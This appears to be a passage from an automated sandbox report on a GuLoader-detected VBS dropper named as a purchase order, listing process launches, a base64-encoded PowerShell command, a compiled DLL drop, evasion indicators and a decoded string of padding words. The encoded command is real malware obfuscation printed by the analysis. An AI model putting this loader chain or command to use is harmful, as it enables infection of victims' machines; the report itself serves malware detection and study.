    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"Jump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_01
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220512Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\OVER.datJump to behavior
    Source: classification engineClassification label: mal84.troj.evad.winVBS@8/9@0/0
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.pdb source: powershell.exe, 00000012.00000002.801305815.0000000004CD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.801562069.0000000004EB4000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00FA2F52 push FFFFFF8Bh; iretd 18_2_00FA2F54
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00FA12A1 push es; ret 18_2_00FA12B0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1083Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 838Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000012.00000002.800533822.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 00000012.00000002.800533822.0000000004ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Encrypted powershell cmdline option found
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Disdai Dishuma5 Sort TAFFE Crampoond GRUNTINGB Preambulat3 Assimil6 Fursemideb Furiensdec Alarmure2 Chorib HUMO FISTELSTEM Stege chesse barrymor Anngrethe3 #Remingli4 ernr Bespyt Sulphozin8 VIRGULA IFRD Fore Pluralveks1 Profilenu nonfo Injust9 Nourishmen3 tomahavken Essay1 BLAA transmog hulk inlaye #kvar Kobangfor6 Hyperarc6 GARDEROBEN Oncosphere Bunglin BARYT TOMASTE CORROBORAT CYKELPAR Stadslg3 Bacilleb BLURTIN administr Milieub3 Bladele8 apometab #Peal8 King9 Opmrkerco IDELIGESI Systemat7 Preoper3 Reso SPAGNUM Land reckoni depraver fartjsfort LANN Griffonag3 AFSE hjsd analysearb AMULAS #unjolly Instrumen GLALIINGL Resoap Womani Leggier5 UNBREAKING Orillio adrea ALTOLAT Fago2 Inflammat6 COCKNEYDOM SYMPOSI gravereu FORUD FASTRESFI Kontrol SKRLEV ANALYTIKER UNCR Sortsr vidnefrs EOCARBO Takt Betvivler3 Velar #Revancher Wordables lousierma indlogrbrn Atta REBLOWNGU QUEBRITHC GRNSEOVERG frytlernes LEMPELIGES #andelss Camballm4 Sortering Lngstleven outboxe SIGNIFICAT Mana DUNKARD Unscor tronb hypohemiag MATTESTE engros Feri2 UNCONVE Mindstehj Nitrogen chev Korp6 stted miskred umenneske Galoplo Udskriv2 MAGNETOMET TRILLIONTH HAARBRSTE Immatc6 drueh Ssla Countryro2 Nonex #Alisphen sula idmmel Tribrac2 Tilegnel Unde dksd tujasur Circ8 Broo Appe1 Oksehude netstroem Teknolog2 klore BALLADR UNFLUTTERE boyko Tilbringe physi FELWO Generisktv5 Sukke Lodgeart3 #Unevada Enceph2 poleremi zakariass scoll Boatl7 Samar Hutchi acetanion INTE Stubb alde Lambk Nonretra Skan
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Disdai Dishuma5 Sort TAFFE Crampoond GRUNTINGB Preambulat3 Assimil6 Fursemideb Furiensdec Alarmure2 Chorib HUMO FISTELSTEM Stege chesse barrymor Anngrethe3 #Remingli4 ernr Bespyt Sulphozin8 VIRGULA IFRD Fore Pluralveks1 Profilenu nonfo Injust9 Nourishmen3 tomahavken Essay1 BLAA transmog hulk inlaye #kvar Kobangfor6 Hyperarc6 GARDEROBEN Oncosphere Bunglin BARYT TOMASTE CORROBORAT CYKELPAR Stadslg3 Bacilleb BLURTIN administr Milieub3 Bladele8 apometab #Peal8 King9 Opmrkerco IDELIGESI Systemat7 Preoper3 Reso SPAGNUM Land reckoni depraver fartjsfort LANN Griffonag3 AFSE hjsd analysearb AMULAS #unjolly Instrumen GLALIINGL Resoap Womani Leggier5 UNBREAKING Orillio adrea ALTOLAT Fago2 Inflammat6 COCKNEYDOM SYMPOSI gravereu FORUD FASTRESFI Kontrol SKRLEV ANALYTIKER UNCR Sortsr vidnefrs EOCARBO Takt Betvivler3 Velar #Revancher Wordables lousierma indlogrbrn Atta REBLOWNGU QUEBRITHC GRNSEOVERG frytlernes LEMPELIGES #andelss Camballm4 Sortering Lngstleven outboxe SIGNIFICAT Mana DUNKARD Unscor tronb hypohemiag MATTESTE engros Feri2 UNCONVE Mindstehj Nitrogen chev Korp6 stted miskred umenneske Galoplo Udskriv2 MAGNETOMET TRILLIONTH HAARBRSTE Immatc6 drueh Ssla Countryro2 Nonex #Alisphen sula idmmel Tribrac2 Tilegnel Unde dksd tujasur Circ8 Broo Appe1 Oksehude netstroem Teknolog2 klore BALLADR UNFLUTTERE boyko Tilbringe physi FELWO Generisktv5 Sukke Lodgeart3 #Unevada Enceph2 poleremi zakariass 